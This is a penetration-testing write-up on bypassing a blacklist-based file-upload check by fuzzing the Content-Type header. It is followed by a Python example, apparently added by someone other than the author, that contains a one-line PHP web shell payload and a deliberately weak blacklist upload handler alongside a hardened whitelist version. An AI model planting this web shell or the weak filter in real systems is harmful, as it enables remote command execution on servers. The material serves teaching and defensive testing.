Greetings everyone from Porta Platea,
In this article I want to walk through a situation I ran into while testing a file upload feature.
1. I received the necessary information for the “private.com” tests to be carried out by our project manager.
2. I verified the “scope form” right after the disclosure process.
3. I completed the discovery steps on the target application and started the security tests.
4. After detecting a few vulnerabilities, I moved on to targeted tests of the application's file upload area. Why that area in particular?
File upload features matter a great deal in application security: a weakness there can let an attacker upload a malicious file to the server, and if the server then executes that file (a server-side script, for example), we end up with a shell on the host.
5. With that in mind, after running the usual file upload attacks, I moved on to the last check on my checklist.
Check name: Content-Type attack checks
The purpose of this check is to determine whether the application protects the upload with a blacklist or a whitelist. A blacklist (a list of rejected types, with everything else allowed) is far more likely to be bypassed than a whitelist (a list of allowed types, with everything else rejected); a whitelist has to be defeated with considerably more advanced techniques. With this in mind, I built a detailed list by searching for MIME types on Google: I collected about 1617 MIME-type variants and saved them in a small txt wordlist.
The aim is to find out which types are accepted and which are rejected by sending the MIME types from this list one by one in the Content-Type header of the file part of the application's upload request. If the application rejects every one of them, it has most likely implemented a whitelist-based control, and we will have to build our attack vectors on top of the formats it does accept. Keep in mind that the Content-Type header is set by the client and is therefore entirely under our control; a check that relies on it alone says nothing about what is actually inside the file.
6. By loading the "content-types.txt" file I had created into Intruder in Burp Suite, I started the trial-and-error run against the application's Content-Type header, and, as I had guessed, the application used a blacklist-based control: I found that only files of certain formats were blocked and the rest could be uploaded without difficulty.
7. From there, using a Content-Type the application did not block, I was able to upload a small file that produced command output and read the output of the command.
8. I finished the day highly motivated, adding the finding and its evidence to our security report.
When testing the various features of an application, keep applying further attack vectors and don't give up; that persistence is how you find vulnerabilities.
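To make the procedure in steps 5 and 6 concrete, here is an added Python example (my own, not the author's script and not the target application's code). It builds the multipart upload request with an attacker-chosen part Content-Type, replays a wordlist against two hypothetical upload handlers, and infers from the accept/reject pattern whether the control is a blacklist or a whitelist. The candidate list, the PHP payload, the PNG sample and both handlers are constructed for the example; the real run used Burp Intruder and a list of about 1617 types against a live application.

```python
import re
import uuid

# Constructed slice of a Content-Type wordlist. The write-up used a list of
# roughly 1617 MIME types; these ten are enough to show the technique.
CANDIDATE_TYPES = [
    "image/png", "image/jpeg", "image/gif", "text/plain", "text/html",
    "application/json", "application/octet-stream",
    "application/x-php", "application/x-httpd-php", "text/x-php",
]

# Constructed upload payload: a one-line PHP web shell. Whether it actually
# executes depends on the server, not on the Content-Type header.
PAYLOAD = b"<?php echo shell_exec($_GET['cmd']); ?>"
# Constructed minimal PNG: signature plus a few bytes of filler.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def build_multipart(filename, content_type, data):
    """Build the multipart/form-data request an upload form sends.

    The per-part Content-Type is whatever the client writes, which is
    exactly the header Burp Intruder cycles through in the write-up.
    Returns (request headers, body bytes).
    """
    boundary = "----WebKitFormBoundary" + uuid.uuid4().hex[:16]
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    headers = {"Content-Type": f"multipart/form-data; boundary={boundary}"}
    return headers, head + data + tail


def parse_part(headers, body):
    """Server side: extract (filename, declared type, bytes) from the first part."""
    boundary = headers["Content-Type"].split("boundary=", 1)[1].encode()
    part = body.split(b"--" + boundary + b"\r\n", 1)[1]
    part = part.split(b"\r\n--" + boundary, 1)[0]
    raw_headers, _, data = part.partition(b"\r\n\r\n")
    hdrs = raw_headers.decode()
    filename = re.search(r'filename="([^"]*)"', hdrs).group(1)
    ctype = re.search(r"Content-Type: (\S+)", hdrs).group(1)
    return filename, ctype, data


# Two hypothetical server-side upload handlers, constructed for the example.

BLOCKED_TYPES = {"application/x-php", "application/x-httpd-php", "text/x-php"}


def blacklist_upload(headers, body):
    """Weak control: reject a few known-bad declared types, accept everything else."""
    _, ctype, _ = parse_part(headers, body)
    return ctype not in BLOCKED_TYPES


ALLOWED = {  # declared type -> (magic bytes, allowed extensions)
    "image/png": (b"\x89PNG\r\n\x1a\n", {"png"}),
    "image/jpeg": (b"\xff\xd8\xff", {"jpg", "jpeg"}),
    "image/gif": (b"GIF8", {"gif"}),
}


def whitelist_upload(headers, body):
    """Hardened control: declared type must be whitelisted, the file's magic
    bytes must match that type, and the extension must match too. The declared
    Content-Type alone is never trusted because the client chooses it."""
    filename, ctype, data = parse_part(headers, body)
    if ctype not in ALLOWED:
        return False
    magic, exts = ALLOWED[ctype]
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return data.startswith(magic) and ext in exts


def probe(upload, candidates=CANDIDATE_TYPES, filename="shell.php", data=PAYLOAD):
    """Replay the Intruder run: one upload per candidate Content-Type, same file.

    Returns (accepted types, inferred control model). Many acceptances point
    to a blacklist; zero or only a handful point to a whitelist.
    """
    accepted = [ct for ct in candidates if upload(*build_multipart(filename, ct, data))]
    if not accepted:
        model = "whitelist (or the check is not keyed on Content-Type at all)"
    elif len(accepted) / len(candidates) > 0.5:
        model = "blacklist"
    else:
        model = "whitelist"
    return accepted, model


if __name__ == "__main__":
    for name, handler in (("blacklist", blacklist_upload), ("whitelist", whitelist_upload)):
        accepted, model = probe(handler)
        print(f"{name} handler: {len(accepted)}/{len(CANDIDATE_TYPES)} accepted -> looks like a {model}")
        for ct in accepted:
            print(f"  accepted: {ct}")
```

Against the blacklist handler the same PHP file goes through with seven of the ten declared types, which is the pattern the write-up saw; against the whitelist handler nothing goes through, because it checks the bytes and the extension rather than the header. In a real engagement the `upload` callable would send the request over HTTP and classify the response (status code, length, error string), and an all-rejected result still leaves the question of which of the accepted formats can carry a payload the server will execute.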